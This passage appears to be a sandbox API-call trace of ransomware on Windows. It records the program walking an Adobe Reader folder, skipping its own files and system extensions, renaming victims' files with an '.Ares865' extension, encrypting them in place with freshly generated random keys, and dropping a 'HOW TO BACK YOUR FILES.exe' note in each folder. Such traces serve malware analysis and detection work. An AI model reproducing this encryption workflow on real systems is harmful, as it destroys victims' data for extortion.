pbBuffer=0x2ccce18) returned 1 [0154.459] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0154.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0154.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.459] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.460] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.460] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.460] CloseHandle (hObject=0x170) returned 1 [0154.460] CloseHandle (hObject=0x118) returned 1 [0154.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.460] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.461] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 1 [0154.461] lstrcmpiW (lpString1="Viktigt.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.461] lstrcmpiW (lpString1="Viktigt.htm", lpString2="aoldtz.exe") returned 1 [0154.461] lstrcpyW (in: lpString1=0x2cce452, lpString2="Viktigt.htm" | out: lpString1="Viktigt.htm") returned="Viktigt.htm" [0154.461] lstrlenW (lpString="Viktigt.htm") returned 11 [0154.461] lstrlenW (lpString="Ares865") returned 7 [0154.461] lstrcmpiW (lpString1="igt.htm", lpString2="Ares865") returned 1 [0154.461] lstrlenW (lpString=".dll") returned 4 [0154.461] lstrcmpiW (lpString1="Viktigt.htm", lpString2=".dll") returned 1 [0154.461] lstrlenW (lpString=".lnk") returned 4 [0154.461] lstrcmpiW (lpString1="Viktigt.htm", lpString2=".lnk") returned 1 [0154.461] lstrlenW (lpString=".ini") returned 4 [0154.461] lstrcmpiW (lpString1="Viktigt.htm", lpString2=".ini") returned 1 [0154.461] lstrlenW (lpString=".sys") returned 4 [0154.461] lstrcmpiW (lpString1="Viktigt.htm", lpString2=".sys") returned 1 [0154.461] lstrlenW (lpString="Viktigt.htm") returned 11 [0154.462] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.Ares865") returned 60 [0154.462] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm.ares865"), dwFlags=0x1) returned 1 [0154.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.463] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16916) returned 1 [0154.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.464] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.464] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.465] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.465] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.465] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4520, lpName=0x0) returned 0x170 [0154.466] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4520) returned 0x190000 [0154.468] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.469] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.469] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0154.469] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4800 | out: hHeap=0x2b0000) returned 1 [0154.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.469] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.469] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.469] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.469] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.469] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.469] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.469] CloseHandle (hObject=0x170) returned 1 [0154.470] CloseHandle (hObject=0x118) returned 1 [0154.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.470] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4214, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Viktigt.htm", cAlternateFileName="")) returned 0 [0154.470] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0154.470] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7930 [0154.470] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files" [0154.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7928 | out: hHeap=0x2b0000) returned 1 [0154.470] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files") returned 52 [0154.470] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files" [0154.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0154.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0154.471] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0154.472] GetLastError () returned 0x0 [0154.472] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0154.472] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0154.472] CloseHandle (hObject=0x120) returned 1 [0154.472] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0154.472] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0154.472] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e45000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e45000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0154.472] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.472] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0154.472] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e45000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e45000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.472] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.472] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0154.473] lstrcpyW (in: lpString1=0x2cce46a, lpString2="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" | out: lpString1="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" [0154.473] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0154.473] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x324fc8 [0154.473] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0154.473] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e6b160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e6b160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", cAlternateFileName="{AC76B~1")) returned 0 [0154.473] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0154.473] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7930 [0154.473] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" [0154.473] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0154.473] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7928 | out: hHeap=0x2b0000) returned 1 [0154.473] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned 91 [0154.473] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" [0154.473] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0154.473] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0154.474] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0154.474] GetLastError () returned 0x0 [0154.474] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0154.474] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0154.475] CloseHandle (hObject=0x120) returned 1 [0154.475] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0154.475] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0154.475] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e6b160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e6b160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0154.475] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.475] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0154.475] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1027.mst" | out: lpString1="1027.mst") returned="1027.mst" [0154.475] lstrlenW (lpString="1027.mst") returned 8 [0154.475] lstrlenW (lpString="Ares865") returned 7 [0154.475] lstrcmpiW (lpString1="027.mst", lpString2="Ares865") returned -1 [0154.475] lstrlenW (lpString=".dll") returned 4 [0154.475] lstrcmpiW (lpString1="1027.mst", lpString2=".dll") returned 1 [0154.475] lstrlenW (lpString=".lnk") returned 4 [0154.475] lstrcmpiW (lpString1="1027.mst", lpString2=".lnk") returned 1 [0154.475] lstrlenW (lpString=".ini") returned 4 [0154.475] lstrcmpiW (lpString1="1027.mst", lpString2=".ini") returned 1 [0154.475] lstrlenW (lpString=".sys") returned 4 [0154.475] lstrcmpiW (lpString1="1027.mst", lpString2=".sys") returned 1 [0154.475] lstrlenW (lpString="1027.mst") returned 8 [0154.476] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst.Ares865") returned 108 [0154.476] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1027.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1027.mst.ares865"), dwFlags=0x1) returned 1 [0154.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1027.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1027.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.478] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43008) returned 1 [0154.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.478] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.478] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.479] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.479] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.479] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xab00, lpName=0x0) returned 0x170 [0154.480] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab00) returned 0x190000 [0154.483] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.484] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.484] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.484] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.485] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.485] CloseHandle (hObject=0x170) returned 1 [0154.485] CloseHandle (hObject=0x118) returned 1 [0154.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.486] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc438b000, ftCreationTime.dwHighDateTime=0x1d0cebb, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xc438b000, ftLastWriteTime.dwHighDateTime=0x1d0cebb, nFileSizeHigh=0x0, nFileSizeLow=0x8800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1028.mst", cAlternateFileName="")) returned 1 [0154.486] lstrcmpiW (lpString1="1028.mst", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.486] lstrcmpiW (lpString1="1028.mst", lpString2="aoldtz.exe") returned -1 [0154.486] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1028.mst" | out: lpString1="1028.mst") returned="1028.mst" [0154.486] lstrlenW (lpString="1028.mst") returned 8 [0154.486] lstrlenW (lpString="Ares865") returned 7 [0154.486] lstrcmpiW (lpString1="028.mst", lpString2="Ares865") returned -1 [0154.486] lstrlenW (lpString=".dll") returned 4 [0154.486] lstrcmpiW (lpString1="1028.mst", lpString2=".dll") returned 1 [0154.486] lstrlenW (lpString=".lnk") returned 4 [0154.486] lstrcmpiW (lpString1="1028.mst", lpString2=".lnk") returned 1 [0154.486] lstrlenW (lpString=".ini") returned 4 [0154.486] lstrcmpiW (lpString1="1028.mst", lpString2=".ini") returned 1 [0154.486] lstrlenW (lpString=".sys") returned 4 [0154.486] lstrcmpiW (lpString1="1028.mst", lpString2=".sys") returned 1 [0154.486] lstrlenW (lpString="1028.mst") returned 8 [0154.487] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst.Ares865") returned 108 [0154.487] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1028.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1028.mst.ares865"), dwFlags=0x1) returned 1 [0154.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1028.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.489] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34816) returned 1 [0154.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.489] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.490] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.490] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.490] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b00, lpName=0x0) returned 0x170 [0154.491] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b00) returned 0x190000 [0154.494] CryptAcquireContextW (in: phProv=0x2ccce04, 